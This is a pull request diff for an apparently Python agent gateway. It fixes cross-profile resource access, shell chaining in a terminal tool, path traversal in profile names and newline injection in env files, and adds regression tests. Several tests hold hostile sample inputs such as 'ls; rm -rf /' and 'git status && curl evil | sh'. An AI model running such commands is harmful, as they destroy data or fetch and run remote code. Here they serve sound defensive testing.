### PR TITLE
fix(security): IDOR, shell chaining, profile-scoped permissions

### DIFF
--- a/api/deps.py
+++ b/api/deps.py
@@ -58,13 +58,22 @@ async def _validate_key(api_key: str, *, default_limit: int) -> dict:
     return key_info
 
 
+_BOOTSTRAP_KEY_INFO: dict = {
+    "permissions": ["read", "write", "execute", "admin"],
+    "rate_limit": 0,
+    "bootstrap": True,
+}
+
+
 async def verify_api_key(
     request: Request,
     credentials: HTTPAuthorizationCredentials | None = Depends(_bearer_scheme),
 ) -> dict:
-    """Require a valid API key on all protected routes."""
+    """Require a valid API key when HOLIX_REQUIRE_AUTH is enabled."""
     api_key = _api_key_from_request(request, credentials)
     if not api_key:
+        if not settings.effective_require_auth:
+            return dict(_BOOTSTRAP_KEY_INFO)
         raise HTTPException(status_code=401, detail="API key required")
     return await _validate_key(api_key, default_limit=settings.rate_limit_rpm)
 
@@ -114,6 +123,15 @@ class RequestContext:
     api_key_info: dict
 
 
+def _sanitize_profile_name(name: str) -> str:
+    from cli.core import ProfileNotFoundError, validate_profile_name_for_env
+
+    try:
+        return validate_profile_name_for_env(name)
+    except ProfileNotFoundError as exc:
+        raise HTTPException(status_code=400, detail=str(exc)) from exc
+
+
 def resolve_profile_name(
     *,
     header_profile: str | None,
@@ -122,10 +140,16 @@ def resolve_profile_name(
 ) -> str:
     """Profile routing: X-Holix-Profile > model field > gateway host profile."""
     if header_profile and header_profile.strip():
-        return header_profile.strip()
+        return _sanitize_profile_name(header_profile.strip())
     if model and model.strip() and model.strip() not in {"holix", "holix-agent", "hermes-agent"}:
-        return model.strip()
-    return host_profile
+        return _sanitize_profile_name(model.strip())
+    return _sanitize_profile_name(host_profile)
+
+
+def ensure_resource_profile(resource_profile: str, expected_profile: str) -> None:
+    """Reject cross-profile access (returns 404 to avoid resource enumeration)."""
+    if resource_profile != expected_profile:
+        raise HTTPException(status_code=404, detail="Not found")
 
 
 async def get_registry():

--- a/api/gateway.py
+++ b/api/gateway.py
@@ -140,7 +140,7 @@ async def root():
         "status": "running",
         "host_profile": state.host_profile,
         "loaded_profiles": loaded,
-        "require_auth": True,
+        "require_auth": settings.effective_require_auth,
     }
 
 

--- a/api/routers/health.py
+++ b/api/routers/health.py
@@ -26,7 +26,7 @@ async def health(detailed: bool = False):
         "status": "ok",
         "timestamp": datetime.now().isoformat(),
         "agent_ready": agent_ready,
-        "require_auth": True,
+        "require_auth": settings.effective_require_auth,
     }
 
 
@@ -53,7 +53,7 @@ async def health_detailed():
         "loaded_profiles": loaded,
         "active_runs": runs_count,
         "companions": companion_status,
-        "require_auth": True,
+        "require_auth": settings.effective_require_auth,
         "gateway_host": settings.gateway_host,
         "gateway_port": settings.gateway_port,
     }

--- a/api/routers/hermes_sessions.py
+++ b/api/routers/hermes_sessions.py
@@ -9,7 +9,12 @@ from fastapi import APIRouter, Depends, Header, HTTPException
 from fastapi.responses import StreamingResponse
 
 from api import state
-from api.deps import get_registry, resolve_profile_name, verify_api_key
+from api.deps import (
+    ensure_resource_profile,
+    get_registry,
+    resolve_profile_name,
+    verify_api_key,
+)
 from api.schemas.hermes import SessionChatRequest, SessionCreateRequest, SessionPatchRequest
 from api.services.content_parts import (
     UnsupportedContentTypeError,
@@ -38,6 +43,18 @@ def _profile(
         model=None,
         host_profile=state.host_profile or "default",
     )
+
+
+def _require_session(
+    store,
+    session_id: str,
+    expected_profile: str,
+):
+    session = store.get(session_id)
+    if session is None:
+        raise HTTPException(status_code=404, detail="Session not found")
+    ensure_resource_profile(session.profile, expected_profile)
+    return session
 
 
 @router.get("")
@@ -76,11 +93,15 @@ async def create_session(
 
 
 @router.get("/{session_id}")
-async def get_session(session_id: str, key_info: dict = Depends(verify_api_key)):
+async def get_session(
+    session_id: str,
+    key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
+):
     store = _sessions_store()
-    session = store.get(session_id)
-    if session is None:
-        raise HTTPException(status_code=404, detail="Session not found")
+    profile = _profile(x_holix_profile, x_hermes_profile)
+    session = _require_session(store, session_id, profile)
     return session.to_dict()
 
 
@@ -89,8 +110,12 @@ async def patch_session(
     session_id: str,
     body: SessionPatchRequest,
     key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
 ):
     store = _sessions_store()
+    profile = _profile(x_holix_profile, x_hermes_profile)
+    _require_session(store, session_id, profile)
     session = store.update(
         session_id,
         title=body.title,
@@ -102,8 +127,15 @@ async def patch_session(
 
 
 @router.delete("/{session_id}")
-async def delete_session(session_id: str, key_info: dict = Depends(verify_api_key)):
+async def delete_session(
+    session_id: str,
+    key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
+):
     store = _sessions_store()
+    profile = _profile(x_holix_profile, x_hermes_profile)
+    _require_session(store, session_id, profile)
     if not store.delete(session_id):
         raise HTTPException(status_code=404, detail="Session not found")
     return {"deleted": True, "id": session_id}
@@ -115,11 +147,12 @@ async def session_messages(
     limit: int = 50,
     key_info: dict = Depends(verify_api_key),
     registry=Depends(get_registry),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
 ):
     store = _sessions_store()
-    session = store.get(session_id)
-    if session is None:
-        raise HTTPException(status_code=404, detail="Session not found")
+    profile = _profile(x_holix_profile, x_hermes_profile)
+    session = _require_session(store, session_id, profile)
     agent = await registry.get_agent(session.profile)
     messages = await agent.get_conversation_history(session.conversation_id, limit)
     return {"session_id": session_id, "messages": messages, "count": len(messages)}
@@ -130,8 +163,12 @@ async def fork_session(
     session_id: str,
     body: SessionCreateRequest,
     key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
 ):
     store = _sessions_store()
+    profile = _profile(x_holix_profile, x_hermes_profile)
+    _require_session(store, session_id, profile)
     child = store.fork(session_id, title=body.title)
     if child is None:
         raise HTTPException(status_code=404, detail="Session not found")
@@ -144,11 +181,12 @@ async def session_chat(
     body: SessionChatRequest,
     key_info: dict = Depends(verify_api_key),
     registry=Depends(get_registry),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
 ):
     store = _sessions_store()
-    session = store.get(session_id)
-    if session is None:
-        raise HTTPException(status_code=404, detail="Session not found")
+    profile = _profile(x_holix_profile, x_hermes_profile)
+    session = _require_session(store, session_id, profile)
     checker = PermissionChecker(key_info["permissions"])
     if not checker.can_read():
         raise HTTPException(status_code=403, detail="Insufficient permissions")
@@ -180,13 +218,14 @@ async def session_chat_stream(
     body: SessionChatRequest,
     key_info: dict = Depends(verify_api_key),
     registry=Depends(get_registry),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
 ):
     from core.loop_streaming import StreamingAgentLoop
 
     store = _sessions_store()
-    session = store.get(session_id)
-    if session is None:
-        raise HTTPException(status_code=404, detail="Session not found")
+    profile = _profile(x_holix_profile, x_hermes_profile)
+    session = _require_session(store, session_id, profile)
     try:
         parsed = parse_content_parts(body.input)
     except UnsupportedContentTypeError as exc:

--- a/api/routers/hermes_v1.py
+++ b/api/routers/hermes_v1.py
@@ -15,6 +15,7 @@ from fastapi.responses import StreamingResponse
 from api import state
 from api.deps import (
     RequestContext,
+    ensure_resource_profile,
     get_registry,
     resolve_profile_name,
     verify_api_key,
@@ -203,6 +204,7 @@ async def create_response(
         prev = store.get(body.previous_response_id)
         if prev is None:
             raise HTTPException(status_code=404, detail="previous_response_id not found")
+        ensure_resource_profile(prev.profile, ctx.profile)
 
     try:
         parsed = parse_responses_input(body.input)
@@ -248,13 +250,17 @@ async def create_response(
 async def get_response(
     response_id: str,
     key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
 ):
+    ctx = _resolve_ctx(key_info, None, x_holix_profile, x_hermes_profile, None, None, None, None)
     store = state.responses_store
     if store is None:
         raise HTTPException(status_code=503, detail="Responses store unavailable")
     item = store.get(response_id)
     if item is None:
         raise HTTPException(status_code=404, detail="Response not found")
+    ensure_resource_profile(item.profile, ctx.profile)
     return item.to_api_dict()
 
 
@@ -262,10 +268,17 @@ async def get_response(
 async def delete_response(
     response_id: str,
     key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
 ):
+    ctx = _resolve_ctx(key_info, None, x_holix_profile, x_hermes_profile, None, None, None, None)
     store = state.responses_store
     if store is None:
         raise HTTPException(status_code=503, detail="Responses store unavailable")
+    item = store.get(response_id)
+    if item is None:
+        raise HTTPException(status_code=404, detail="Response not found")
+    ensure_resource_profile(item.profile, ctx.profile)
     if not store.delete(response_id):
         raise HTTPException(status_code=404, detail="Response not found")
     return {"deleted": True, "id": response_id}
@@ -324,25 +337,45 @@ async def create_run(
     return {"run_id": record.run_id, "status": record.status.value}
 
 
-@router.get("/runs/{run_id}")
-async def get_run(run_id: str, key_info: dict = Depends(verify_api_key)):
-    runs = state.runs_store
-    if runs is None:
-        raise HTTPException(status_code=503, detail="Runs store unavailable")
+def _require_run(
+    runs,
+    run_id: str,
+    expected_profile: str,
+):
     record = runs.get(run_id)
     if record is None:
         raise HTTPException(status_code=404, detail="Run not found")
+    ensure_resource_profile(record.profile, expected_profile)
+    return record
+
+
+@router.get("/runs/{run_id}")
+async def get_run(
+    run_id: str,
+    key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
+):
+    ctx = _resolve_ctx(key_info, None, x_holix_profile, x_hermes_profile, None, None, None, None)
+    runs = state.runs_store
+    if runs is None:
+        raise HTTPException(status_code=503, detail="Runs store unavailable")
+    record = _require_run(runs, run_id, ctx.profile)
     return record.to_dict()
 
 
 @router.get("/runs/{run_id}/events")
-async def run_events(run_id: str, key_info: dict = Depends(verify_api_key)):
+async def run_events(
+    run_id: str,
+    key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
+):
+    ctx = _resolve_ctx(key_info, None, x_holix_profile, x_hermes_profile, None, None, None, None)
     runs = state.runs_store
     if runs is None:
         raise HTTPException(status_code=503, detail="Runs store unavailable")
-    record = runs.get(run_id)
-    if record is None:
-        raise HTTPException(status_code=404, detail="Run not found")
+    _require_run(runs, run_id, ctx.profile)
 
     async def generate():
         sent = 0
@@ -371,10 +404,17 @@ async def run_events(run_id: str, key_info: dict = Depends(verify_api_key)):
 
 
 @router.post("/runs/{run_id}/stop")
-async def stop_run(run_id: str, key_info: dict = Depends(verify_api_key)):
+async def stop_run(
+    run_id: str,
+    key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
+):
+    ctx = _resolve_ctx(key_info, None, x_holix_profile, x_hermes_profile, None, None, None, None)
     runs = state.runs_store
     if runs is None:
         raise HTTPException(status_code=503, detail="Runs store unavailable")
+    _require_run(runs, run_id, ctx.profile)
     if not runs.request_cancel(run_id):
         raise HTTPException(status_code=404, detail="Run not found")
     return {"status": "stopping", "run_id": run_id}
@@ -385,10 +425,14 @@ async def approve_run(
     run_id: str,
     body: RunApprovalRequest,
     key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
 ):
+    ctx = _resolve_ctx(key_info, None, x_holix_profile, x_hermes_profile, None, None, None, None)
     runs = state.runs_store
     if runs is None:
         raise HTTPException(status_code=503, detail="Runs store unavailable")
+    _require_run(runs, run_id, ctx.profile)
     if not runs.resolve_approval(run_id, body.model_dump()):
         raise HTTPException(status_code=404, detail="Run not found")
     return {"status": "recorded", "run_id": run_id, "decision": body.decision}

--- a/api/routers/legacy_v1.py
+++ b/api/routers/legacy_v1.py
@@ -183,13 +183,19 @@ async def grant_permission(
     scope: str = "session",
     argument_pattern: str | None = None,
     key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
 ):
-    from core.security.confirmation import PermissionScope, permission_manager
+    from core.security.confirmation import PermissionScope, get_permission_manager_for_profile
     from core.security.confirmation import RiskLevel as RL
 
     checker = PermissionChecker(key_info["permissions"])
     if not checker.can_execute():
         raise HTTPException(status_code=403, detail="Execute permission required")
+    profile, _, _ = _ctx_from_headers(
+        key_info, None, x_holix_profile, x_hermes_profile, None, None
+    )
+    permission_manager = get_permission_manager_for_profile(profile)
     try:
         risk_enum = RL(risk_level)
         scope_enum = PermissionScope(scope)
@@ -200,10 +206,17 @@ async def grant_permission(
 
 
 @router.get("/permissions")
-async def list_permissions(key_info: dict = Depends(verify_api_key)):
-    from core.security.confirmation import permission_manager
+async def list_permissions(
+    key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
+):
+    from core.security.confirmation import get_permission_manager_for_profile
 
-    return permission_manager.list_grants()
+    profile, _, _ = _ctx_from_headers(
+        key_info, None, x_holix_profile, x_hermes_profile, None, None
+    )
+    return get_permission_manager_for_profile(profile).list_grants()
 
 
 @router.delete("/permissions/{grant_key}")
@@ -211,10 +224,16 @@ async def revoke_permission(
     grant_key: str,
     scope: str = "always",
     key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
 ):
-    from core.security.confirmation import PermissionScope, permission_manager
+    from core.security.confirmation import PermissionScope, get_permission_manager_for_profile
     from core.security.confirmation import RiskLevel as RL
 
+    profile, _, _ = _ctx_from_headers(
+        key_info, None, x_holix_profile, x_hermes_profile, None, None
+    )
+    permission_manager = get_permission_manager_for_profile(profile)
     try:
         scope_enum = PermissionScope(scope)
     except ValueError:
@@ -236,13 +255,18 @@ async def resolve_confirmation(
     confirmation_id: str,
     choice: str,
     key_info: dict = Depends(verify_api_key),
+    x_holix_profile: str | None = Header(None),
+    x_hermes_profile: str | None = Header(None),
 ):
     from core.security.confirmation import ConfirmationChoice, get_action_guard
 
     checker = PermissionChecker(key_info["permissions"])
     if not checker.can_execute():
         raise HTTPException(status_code=403, detail="Execute permission required")
-    guard = get_action_guard()
+    profile, _, _ = _ctx_from_headers(
+        key_info, None, x_holix_profile, x_hermes_profile, None, None
+    )
+    guard = get_action_guard(profile)
     if guard is None:
         raise HTTPException(status_code=404, detail="No confirmation guard initialized")
     try:

--- a/api/services/env_store.py
+++ b/api/services/env_store.py
@@ -3,6 +3,7 @@
 from __future__ import annotations
 
 import os
+import re
 from pathlib import Path
 
 from core.env_loader import ensure_profile_env_template, profile_env_path
@@ -29,13 +30,25 @@ def read_global_env_map() -> dict[str, str]:
     return _read_env_map(global_env_path())
 
 
+def _format_env_value(value: str) -> str:
+    if re.search(r'[\r\n#"\\]', value):
+        escaped = (
+            value.replace("\\", "\\\\")
+            .replace("\n", "\\n")
+            .replace("\r", "\\r")
+            .replace('"', '\\"')
+        )
+        return f'"{escaped}"'
+    return value
+
+
 def patch_env_file(path: Path, variables: dict[str, str]) -> None:
     lines = path.read_text(encoding="utf-8").splitlines() if path.is_file() else []
     existing_keys = {line.split("=", 1)[0] for line in lines if "=" in line}
     for key, value in variables.items():
         prefix = f"{key}="
         lines = [line for line in lines if not line.startswith(prefix)]
-        lines.append(f"{prefix}{value}")
+        lines.append(f"{prefix}{_format_env_value(value)}")
         os.environ[key] = value
         existing_keys.add(key)
     path.parent.mkdir(parents=True, exist_ok=True)

--- a/cli/core.py
+++ b/cli/core.py
@@ -1,6 +1,7 @@
 """Core profile management and initialization for Holix CLI."""
 
 import os
+import re
 from pathlib import Path
 from typing import Any
 
@@ -101,9 +102,17 @@ def default_profile_allowed() -> bool:
     return _holix_env_name() != "production"
 
 
+_PROFILE_NAME_RE = re.compile(r"^[a-zA-Z0-9][a-zA-Z0-9_.-]{0,63}$")
+
+
 def validate_profile_name_for_env(profile: str) -> str:
-    """Reject reserved ``default`` profile name in production."""
+    """Reject invalid, path-traversal, and reserved ``default`` profile names."""
     name = (profile or "").strip() or "default"
+
+    if ".." in name or "/" in name or "\\" in name or name in {".", ".."}:
+        raise ProfileNotFoundError(f"Invalid profile name: {profile!r}")
+    if not _PROFILE_NAME_RE.fullmatch(name):
+        raise ProfileNotFoundError(f"Invalid profile name: {profile!r}")
 
     if _holix_env_name() == "production" and name == "default":
         raise ProfileNotFoundError(

--- a/core/agent.py
+++ b/core/agent.py
@@ -292,6 +292,7 @@ class HolixAgent:
             interactive=interactive,
             confirmation_timeout=self.config.confirmation_timeout,
             data_dir=self.config.data_dir,
+            profile_name=self.config.profile_name,
         )
         self.tools.set_action_guard(guard)
 

--- a/core/security/confirmation.py
+++ b/core/security/confirmation.py
@@ -654,6 +654,8 @@ class ActionGuard:
 # ─── Global instance and init ──────────────────────────────────────────────
 
 _action_guard: ActionGuard | None = None
+_profile_action_guards: dict[str, ActionGuard] = {}
+_profile_permission_managers: dict[str, PermissionManager] = {}
 
 
 def configure_security_storage(data_dir: str | Path) -> None:
@@ -667,25 +669,53 @@ def init_action_guard(
     interactive: bool = True,
     confirmation_timeout: int = 0,
     data_dir: str | Path | None = None,
+    profile_name: str | None = None,
 ) -> ActionGuard:
     """Initialize the global ActionGuard instance.
 
     Called by HolixAgent after the event bus is ready.
     """
     global _action_guard
-    if data_dir is not None:
+    profile_key = (profile_name or "").strip() or None
+    if data_dir is not None and profile_key:
+        pm = PermissionManager(data_dir=data_dir)
+        _profile_permission_managers[profile_key] = pm
+    elif data_dir is not None:
         configure_security_storage(data_dir)
-    _action_guard = ActionGuard(
+        pm = permission_manager
+    else:
+        pm = permission_manager
+
+    guard = ActionGuard(
         event_bus=event_bus,
-        permission_manager=permission_manager,
+        permission_manager=pm,
         auto_allow_threshold=auto_allow_threshold,
         interactive=interactive,
         confirmation_timeout=confirmation_timeout,
         data_dir=data_dir,
     )
+    if profile_key:
+        _profile_action_guards[profile_key] = guard
+    _action_guard = guard
+    return guard
+
+
+def get_action_guard(profile_name: str | None = None) -> ActionGuard | None:
+    """Get ActionGuard for a profile, or the last-initialized global guard."""
+    profile_key = (profile_name or "").strip() or None
+    if profile_key:
+        return _profile_action_guards.get(profile_key) or _action_guard
     return _action_guard
 
 
-def get_action_guard() -> ActionGuard | None:
-    """Get the global ActionGuard instance (or None if not initialized)."""
-    return _action_guard
+def get_permission_manager_for_profile(profile_name: str) -> PermissionManager:
+    """Return the permission store scoped to a profile."""
+    profile_key = (profile_name or "").strip() or "default"
+    existing = _profile_permission_managers.get(profile_key)
+    if existing is not None:
+        return existing
+    from core.paths import resolve_profile_data_dir
+
+    pm = PermissionManager(data_dir=resolve_profile_data_dir(profile_key))
+    _profile_permission_managers[profile_key] = pm
+    return pm

--- a/core/security/safety.py
+++ b/core/security/safety.py
@@ -53,6 +53,11 @@ _WINDOWS_DANGEROUS: list[str] = [
 ]
 
 
+_SHELL_CHAINING = re.compile(
+    r"(?:&&|\|\||[;|&`$<>]|\$\(|\n|\r)"
+)
+
+
 class CommandWhitelist:
     """Manage allowed commands for terminal execution."""
 
@@ -73,6 +78,9 @@ class CommandWhitelist:
         """
         command_lower = command.lower().strip()
 
+        if _SHELL_CHAINING.search(command):
+            return False, "Blocked shell chaining or redirection"
+
         for pattern in self.dangerous_patterns:
             if re.search(pattern, command_lower):
                 return False, f"Blocked dangerous pattern: {pattern}"
@@ -83,7 +91,7 @@ class CommandWhitelist:
             return True, None
 
         for safe_cmd in self.safe_commands:
-            if command_lower.startswith(safe_cmd):
+            if command_lower == safe_cmd or command_lower.startswith(f"{safe_cmd} "):
                 return True, None
 
         return False, f"Command '{base_cmd}' not in whitelist"

--- a/core/tools/terminal.py
+++ b/core/tools/terminal.py
@@ -1,7 +1,8 @@
 import asyncio
+import shlex
 
 from config import settings
-from core.platform_compat import subprocess_shell_kwargs
+from core.platform_compat import IS_WINDOWS, subprocess_shell_kwargs
 from core.security.safety import command_whitelist
 from core.tools.base import BaseTool
 
@@ -57,8 +58,16 @@ class TerminalTool(BaseTool):
             if root is not None:
                 cwd = str(root)
 
-            process = await asyncio.create_subprocess_shell(
-                command,
+            try:
+                argv = shlex.split(command, posix=not IS_WINDOWS)
+            except ValueError as exc:
+                return f"Error: Invalid command syntax: {exc}"
+
+            if not argv:
+                return "Error: Empty command"
+
+            process = await asyncio.create_subprocess_exec(
+                *argv,
                 stdout=asyncio.subprocess.PIPE,
                 stderr=asyncio.subprocess.PIPE,
                 cwd=cwd,

--- a/tests/test_confirmation.py
+++ b/tests/test_confirmation.py
@@ -559,7 +559,7 @@ class TestSharedPermissionManager:
 
         assert isinstance(pm, PermissionManager)
 
-    def test_init_action_guard_uses_shared_instance(self):
+    def test_init_action_guard_uses_shared_instance_without_profile(self):
         from unittest.mock import MagicMock
 
         from core.security.confirmation import get_action_guard, init_action_guard
@@ -568,3 +568,25 @@ class TestSharedPermissionManager:
         guard = init_action_guard(event_bus=bus, interactive=True)
         assert guard._permission_manager is permission_manager
         assert get_action_guard() is guard
+
+    def test_init_action_guard_uses_profile_scoped_manager(self, tmp_path):
+        from unittest.mock import MagicMock
+
+        from core.security.confirmation import (
+            get_action_guard,
+            get_permission_manager_for_profile,
+            init_action_guard,
+        )
+
+        bus = MagicMock()
+        data_dir = tmp_path / "alice" / "data"
+        guard = init_action_guard(
+            event_bus=bus,
+            interactive=True,
+            data_dir=data_dir,
+            profile_name="alice",
+        )
+        pm = get_permission_manager_for_profile("alice")
+        assert guard._permission_manager is pm
+        assert pm is not permission_manager
+        assert get_action_guard("alice") is guard

--- a/tests/test_env_store.py
+++ b/tests/test_env_store.py
@@ -1,0 +1,16 @@
+"""Tests for Holix env file patching."""
+
+from __future__ import annotations
+
+from api.services.env_store import patch_env_file
+
+
+def test_patch_env_file_escapes_newlines(tmp_path) -> None:
+    path = tmp_path / ".env"
+    path.write_text("EXISTING=1\n", encoding="utf-8")
+
+    patch_env_file(path, {"INJECTED": "line1\nFAKE_KEY=evil"})
+
+    text = path.read_text(encoding="utf-8")
+    assert "FAKE_KEY=evil" not in text.splitlines()[1:]
+    assert 'INJECTED="line1\\nFAKE_KEY=evil"' in text

--- a/tests/test_gateway_auth_required.py
+++ b/tests/test_gateway_auth_required.py
@@ -33,6 +33,16 @@ def test_protected_route_accepts_x_api_key_header(gateway_client: TestClient) ->
     assert response.json()["object"] == "list"
 
 
+def test_bootstrap_mode_allows_unauthenticated(gateway_client, monkeypatch) -> None:
+    from config import settings
+
+    monkeypatch.setattr(settings, "require_auth", False)
+    monkeypatch.setattr(settings, "holix_env", "development")
+
+    response = gateway_client.get("/v1/models")
+    assert response.status_code == 200
+
+
 def test_openapi_uses_single_authorize_scheme() -> None:
     import api.gateway
 

--- a/tests/test_gateway_import.py
+++ b/tests/test_gateway_import.py
@@ -12,12 +12,13 @@ def test_gateway_module_imports() -> None:
     assert api.gateway.app is not None
 
 
-def test_permissions_endpoints_use_shared_manager(
+def test_permissions_endpoints_use_profile_scoped_manager(
     gateway_client: TestClient,
     gateway_auth_headers: dict,
 ) -> None:
-    from core.security.confirmation import permission_manager
+    from core.security.confirmation import get_permission_manager_for_profile
 
+    permission_manager = get_permission_manager_for_profile("default")
     permission_manager.clear_session()
     client = gateway_client
     headers = gateway_auth_headers

--- a/tests/test_gateway_profile_isolation.py
+++ b/tests/test_gateway_profile_isolation.py
@@ -1,0 +1,76 @@
+"""Cross-profile access must be denied on gateway resource routes."""
+
+from __future__ import annotations
+
+from fastapi.testclient import TestClient
+
+
+def _profile_headers(profile: str, base: dict[str, str]) -> dict[str, str]:
+    return {**base, "X-Holix-Profile": profile}
+
+
+def test_session_idor_blocked(gateway_client: TestClient, gateway_auth_headers: dict) -> None:
+    created = gateway_client.post(
+        "/api/sessions",
+        headers=_profile_headers("alice", gateway_auth_headers),
+        json={"title": "alice session"},
+    )
+    assert created.status_code == 200
+    sid = created.json()["id"]
+    assert created.json()["profile"] == "alice"
+
+    denied = gateway_client.get(
+        f"/api/sessions/{sid}",
+        headers=_profile_headers("bob", gateway_auth_headers),
+    )
+    assert denied.status_code == 404
+
+    allowed = gateway_client.get(
+        f"/api/sessions/{sid}",
+        headers=_profile_headers("alice", gateway_auth_headers),
+    )
+    assert allowed.status_code == 200
+
+
+def test_response_idor_blocked(gateway_client: TestClient, gateway_auth_headers: dict) -> None:
+    import api.state
+
+    store = api.state.responses_store
+    assert store is not None
+    stored = store.save(
+        profile="alice",
+        payload={"object": "response", "status": "completed", "output": []},
+        conversation="conv-alice",
+    )
+
+    denied = gateway_client.get(
+        f"/v1/responses/{stored.id}",
+        headers=_profile_headers("bob", gateway_auth_headers),
+    )
+    assert denied.status_code == 404
+
+    allowed = gateway_client.get(
+        f"/v1/responses/{stored.id}",
+        headers=_profile_headers("alice", gateway_auth_headers),
+    )
+    assert allowed.status_code == 200
+
+
+def test_run_idor_blocked(gateway_client: TestClient, gateway_auth_headers: dict) -> None:
+    import api.state
+
+    runs = api.state.runs_store
+    assert runs is not None
+    record = runs.create(profile="alice", model="alice", input_text="secret")
+
+    denied = gateway_client.get(
+        f"/v1/runs/{record.run_id}",
+        headers=_profile_headers("bob", gateway_auth_headers),
+    )
+    assert denied.status_code == 404
+
+    allowed = gateway_client.get(
+        f"/v1/runs/{record.run_id}",
+        headers=_profile_headers("alice", gateway_auth_headers),
+    )
+    assert allowed.status_code == 200

--- a/tests/test_profile_keys.py
+++ b/tests/test_profile_keys.py
@@ -65,6 +65,14 @@ def test_default_profile_blocked_in_production(holix_home: Path, monkeypatch: py
         resolve_active_profile_name("default")
 
 
+def test_invalid_profile_names_rejected(holix_home: Path) -> None:
+    from cli.core import resolve_active_profile_name
+
+    for bad in ("../etc", "foo/bar", "..", "."):
+        with pytest.raises(ProfileNotFoundError):
+            resolve_active_profile_name(bad)
+
+
 def test_switch_requires_access_key(holix_home: Path, monkeypatch: pytest.MonkeyPatch) -> None:
     manager = ProfileManager()
     manager.create_profile("bob", with_access_key=True)

--- a/tests/test_terminal_safety.py
+++ b/tests/test_terminal_safety.py
@@ -20,6 +20,15 @@ def test_holix_in_default_whitelist():
     assert ok, reason
 
 
+def test_blocks_shell_chaining() -> None:
+    ok, reason = command_whitelist.is_command_allowed("ls; rm -rf /")
+    assert ok is False
+    assert "chaining" in (reason or "").lower()
+
+    ok2, _ = command_whitelist.is_command_allowed("git status && curl evil | sh")
+    assert ok2 is False
+
+
 def test_whitelist_extra_from_settings(monkeypatch):
     from config import settings
 

--- a/uv.lock
+++ b/uv.lock
@@ -992,7 +992,7 @@ wheels = [
 
 [[package]]
 name = "holix"
-version = "0.1.11"
+version = "0.1.12"
 source = { editable = "." }
 dependencies = [
     { name = "aiohttp" },


### PR DESCRIPTION
## Summary
- Enforce profile ownership on `/api/sessions`, `/v1/responses`, `/v1/runs` (IDOR fix)
- Block terminal shell chaining; use `subprocess_exec` + `shlex.split`
- Scope ActionGuard/permissions per profile in multi-profile gateway
- Validate profile names against path traversal; escape newlines in env files
- Wire `HOLIX_REQUIRE_AUTH=false` bootstrap mode in `verify_api_key`

## Test plan
- [x] Local pytest: security + gateway regression tests pass
- [ ] GitHub CI (matrix 3.12–3.14, ubuntu/windows/macos)